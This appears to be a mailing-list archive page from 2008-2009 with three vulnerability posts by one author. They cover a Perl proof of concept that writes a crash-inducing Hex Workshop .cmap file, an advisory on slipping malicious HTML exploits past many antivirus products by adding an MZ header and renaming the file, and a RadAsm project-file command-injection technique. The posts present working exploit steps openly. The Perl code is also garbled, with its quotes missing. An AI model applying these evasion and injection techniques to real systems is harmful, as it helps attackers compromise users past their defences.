Hex Workshop v6 ColorMap files .cmap Invalid Memory Reference crash POC

2009-02-03 Thread xhakerman2006 
#!/usr/bin/perl -w

# Hex Workshop v6 ColorMap files .cmap Invalid Memory Reference crash POC

# Discovred by : DATA_SNIPER

# for more information vist my blog:http://datasniper.arab4services.net/

# the Exploit it's  very hard to implemented,if we can make the reference 
point to  valid memory location contain

# unicode string we can corrupt the memory and get code execution(it's not so 
easy as you can see,try it manually in olly).

print 
==\n;

print Hex Workshop v6 (ColorMap files .cmap) Invalid Memory Reference crash 
POC\n;

print Discovred by DATA_SNIPER\n;

print Greetz to: arab4services team and AT4RE Team\n;

print = 
\n;

my $crash = '#Simple POC by DATA_SNIPER'.\n.'%s= RGB(0, 0, 0)'; #don't 
worry about it ,it's not Format string bug :)

my $file = cr4sh.cmap ;

open(my $data, $file) or die Cannot open $file;

print $data $crash;

close($data);

print $file has been created\n;

print open it in HexWorkshop.\n;

Multiple Vendor Anti-Virus Software Malicious WebPage Detection Bypass -Update-

2008-12-09 Thread xhakerman2006 
Litel Update.

in the previous advisory there was some wrong report because of, the update of 
anti-virus product version.



Multiple Vendor Anti-Virus Software Malicious WebPage Detection Bypass

   [_] Discovred by : DATA_SNIPER

   [_] Greets to:  hacker cc Team , Arab4Services team on 
www.arab4services.net , AT4RE Team on www.at4re.com

   [_] Special thanks go to: Andrey Bayora and all arabian hackers 
specialy algerian hackers.

NOTIFICATION:

this exploit are based on Andrey Bayora magic of magic byte but with some 
development.

This proof of concept was created for educational purposes only,Use the code it 
at your own risk.

The author will not be responsible for any damages.

*

Exploit Information:

Date: 2008/19/08

Impact: Baypassing the Detection of  Malicious web page that can compromise 
a user's system

Vulnerabled AV-Software:

   ESET Smart Security Latest Version=(the Exploit was dedicated for it)

   AhnLab-V32008.12.4.1

   AntiVir  7.9.0.362008.12.04

   Avast4.8.1281.0

   CAT-QuickHeal10.00

   ClamAV   0.94.1

   DrWeb4.44.0.09170

   Ewido4.0

   Ikarus   T3.1.1.45.0

   K7AntiVirus  7.10.541

   NOD323662

   Norman   5.80.02

   Panda9.0.0.4

   Prevx1   V2

   Rising   21.06.31.00

   SecureWeb-Gateway

   Sunbelt  3.1.1832.2

   TheHacker6.3.1.2.174

   TrendMicro   8.700.0.1004

   ViRobot   2008.12.4.1499

the things that must be considered that the POC it's variant  from exploit to 
exploit(some times

Kaspersky and the other famous AV Sofware can be  deceive).

Proof Of Concept:

as i said the exploit are based on the magic of magic byte methode we will 
first add the MZ Header to the HTML Exploit and  change the exstention to txt 
or jpg or non extension,the exploit is compatible with IE6 and IE7 because 
IE67  execute the HTML Event if it's in txt file or non extension files.

so the exploit it's with corporate of IE67 :).

virustotal result of  MS Internet Explorer 6/7 (XML Core Services)  Remote Code 
Execution Exploit

http://www.virustotal.com/analisis/2fce2b49876e27b4144fd39be466200e

and print screen for the scann in VirusTotal.

http://members.lycos.co.uk/datasniper/a.jpg

http://members.lycos.co.uk/datasniper/b.jpg

http://members.lycos.co.uk/datasniper/c.jpg

POC:

1-add the MZ Header to the HTML file:

MZ#1711;       #1746;#1746;  ¸   @   
#1591;   #1563; ´#1581;!¸L#1581;!This program cannot be run in DOS 
mode.

you can put other EXE info on the HTML Body for more deception.

-rename the HTML to non extension file or txt or jpg.

3-upload it to webserver.

http://localhost/mallpage.txt or http://localhost/mallpagenon extenstion.

video POC:

Simple video explain how the vulnerability can be exploited  under ESET Smart 
Security (arabic).

--

RadAsm =2.2.1.5 Local Command Execution

2008-12-08 Thread xhakerman2006 
--

vulnerability discovered by DATA_SNIPER.

bug discovred in 25/11/2008.

infected version:All Version

greetz go to:www.at4re.com(Arab Team 4 Reverse Engineering),arab4services.net

Critical: Highly critical

Impact:Command Execution

--

this is litel POC that can execute arabitrary command in victime machine.

in unexpected way the attacker can put in the project file .rap file command 
instead of the linker path or  Macro Assembler ML.exe path.

project file look like this.

 some data has been cuted for making it readable

-

project file structure

[Project]

Assembler=masm

Type=Win32 App

..datat

[Files]

1=file.Asm

.data

[MakeFiles]

5=CRC Check.exe

[MakeDef]

Menu=1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0

1=4,O,$B\RC.EXE /v,1 ==Command Execution by replacing the original file path 
with the command

2=3,O,$B\ML.EXE /c /coff /Cp /nologo /I$I,2  ==Command Execution by 
replacing the original file path with the command

3=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:$L 
/OUT:$5,3,4 ==Command Execution by replacing the original file path with the 
command

4=0,0,,5

5=rsrc.obj,O,$B\CVTRES.EXE,rsrc.res ==Command Execution by replacing the 
original file path with the command

7=0,0,$E\OllyDbg,5

6=*.obj,O,$B\ML.EXE /c /coff /Cp /nologo /I$I,*.asm

11=4,O,$B\RC.EXE /v,1   ==Command Execution by replacing the original file 
path with the command

12=3,O,$B\ML.EXE /c /coff /Cp /Zi /nologo /I$I,2   ==Command Execution by 
replacing the original file path with the command

13=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /DEBUG /VERSION:4.0 /LIBPATH:$L 
/OUT:$5,3,4 ==Command Execution by replacing the original file path with the 
command

data.

[Resource]

data.and more data.

--

as you see  ==Command Execution breplacing the original file name with the 
command this mean, that type of data in the project it's  exploited as command 
execution by malicious people.

and when the user try to compile the project will face the issue of executing 
bad command in his operating system.